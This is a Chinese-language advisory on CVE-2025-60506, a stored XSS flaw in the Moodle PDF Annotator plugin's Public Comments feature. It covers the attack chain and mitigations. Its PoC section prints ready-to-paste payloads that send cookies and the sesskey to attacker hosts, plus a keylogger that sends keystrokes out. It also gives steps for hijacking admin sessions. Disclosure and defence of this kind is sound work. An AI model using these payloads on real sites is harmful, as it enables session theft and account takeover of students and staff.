CVE-2025-60506：Moodle PDF Annotator插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-60506

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Moodle PDF Annotator Plugin

漏洞概述

CVE-2025-60506是Moodle PDF Annotator插件v1.5 release 9版本中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于插件的Public Comments（公共评论）功能中，允许具有低权限账户（如学生）的攻击者向PDF注释评论中注入任意JavaScript代码。当其他用户（包括学生、教师或管理员）查看被注释的PDF文档时，注入的恶意脚本将在其浏览器中自动执行，可能导致会话劫持、凭据窃取或执行其他攻击者控制的操作。

该漏洞的CVSS 3.1评分为5.4，属于中等严重级别。攻击向量为网络（AV:N），攻击复杂度低（AC:L），但需要低权限认证（PR:L）和用户交互（UI:R）。漏洞的影响范围为变更型（S:C），对机密性和完整性有低影响，对可用性无影响。由于Moodle是全球广泛使用的开源学习管理系统（LMS），PDF Annotator插件被许多教育机构用于在线课程中标注PDF文档，因此该漏洞可能影响大量教育用户的数据安全。

此漏洞的利用门槛相对较低，仅需要基本的用户账户即可实施攻击，且无需特殊的技术知识即可注入恶意脚本。教育机构管理员应高度重视此漏洞，及时采取修复措施以保护师生账户安全。

技术细节

该漏洞的根本原因在于Moodle PDF Annotator插件v1.5 release 9版本的Public Comments功能未对用户输入进行充分的过滤和转义处理。具体技术原理如下：

1. **输入验证缺失**：插件在处理用户提交的评论内容时，未对HTML标签和JavaScript代码进行适当的过滤或编码处理。攻击者可以直接在评论框中输入包含恶意脚本的内容。

2. **存储机制**：恶意评论被存储到数据库中，由于缺乏输出编码，每次有用户访问该PDF文档并查看注释时，存储的恶意脚本都会从数据库中检索并直接渲染到浏览器页面中。

3. **执行上下文**：当受害者（学生、教师或管理员）打开被注释的PDF文件查看公共评论时，恶意JavaScript代码将在受害者的浏览器会话上下文中执行。由于Moodle的用户会话通常包含身份验证令牌，攻击者可以利用这些信息进行会话劫持。

4. **攻击向量**：攻击者使用低权限账户（如学生）登录Moodle平台，打开目标PDF文档，在Public Comments区域注入XSS payload（如`<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>`）。当其他用户查看该PDF时，恶意脚本自动执行，可能窃取会话cookie、重定向到钓鱼页面或执行其他恶意操作。

5. **权限提升潜力**：由于管理员账户也会查看PDF文档，攻击者可以通过XSS窃取管理员会话，进而执行管理员权限的操作，如修改课程内容、创建后门账户等。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者注册或获取一个Moodle平台的学生账户，作为攻击的起点。

STEP 2

步骤2：定位目标PDF文档

攻击者浏览课程内容，定位使用PDF Annotator插件注释的PDF文档，这些文档通常具有公共评论功能。

STEP 3

步骤3：注入恶意脚本

攻击者在PDF的Public Comments区域提交包含恶意JavaScript代码的评论。由于插件缺乏输入过滤，恶意脚本被成功存储。

STEP 4

步骤4：等待受害者查看

恶意评论被持久化存储。当其他用户（学生、教师或管理员）打开该PDF文档查看注释时，浏览器会渲染并执行存储的恶意脚本。

STEP 5

步骤5：窃取敏感信息

恶意脚本在受害者浏览器上下文中执行，窃取会话cookie、CSRF令牌等敏感信息，并将其发送到攻击者控制的服务器。

STEP 6

步骤6：会话劫持与权限提升

攻击者利用窃取的会话信息冒充受害者身份登录平台。如果劫持的是管理员账户，攻击者可以执行任意管理操作，包括创建后门账户、修改课程内容等。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Stored XSS PoC for Moodle PDF Annotator Plugin v1.5 release 9 (CVE-2025-60506) -->
<!-- Attack Vector: Public Comments feature in PDF annotations -->
<!-- Prerequisite: Low-privileged account (e.g., Student) -->

<!-- Basic cookie stealing payload -->
<script>
  var img = new Image();
  img.src = 'https://attacker-server.com/steal?cookie=' + encodeURIComponent(document.cookie) + '&session=' + encodeURIComponent(document.cookie);
</script>

<!-- Alternative: Session hijacking via fetch -->
<script>
  fetch('https://attacker-server.com/exfil', {
    method: 'POST',
    mode: 'no-cors',
    body: JSON.stringify({
      cookies: document.cookie,
      url: window.location.href,
      sesskey: document.querySelector('input[name="sesskey"]')?.value || ''
    })
  });
</script>

<!-- Alternative: Keylogger payload -->
<script>
  document.addEventListener('keypress', function(e) {
    new Image().src = 'https://attacker-server.com/log?key=' + encodeURIComponent(e.key);
  });
</script>

<!-- Exploitation Steps:
     1. Login to Moodle with a Student account
     2. Navigate to any PDF document annotated with PDF Annotator plugin
     3. In the Public Comments section, paste the XSS payload above
     4. Wait for a Teacher/Admin to view the annotated PDF
     5. The malicious script executes in the victim's browser session
     6. Stolen session data is sent to the attacker's server
-->

影响范围

Moodle PDF Annotator Plugin v1.5 release 9

防御指南

临时缓解措施

在等待官方补丁发布期间，建议采取以下临时缓解措施：1）限制Public Comments功能的使用权限，或暂时禁用该功能；2）部署Web应用防火墙（WAF）规则，检测和阻止常见的XSS payload；3）为所有Moodle会话cookie设置HttpOnly标志，防止JavaScript窃取会话信息；4）实施Content Security Policy（CSP），限制内联脚本执行；5）管理员应定期审查PDF Annotator的评论内容，及时清理可疑评论；6）教育用户不要在查看PDF注释时输入敏感信息，并对异常行为保持警惕。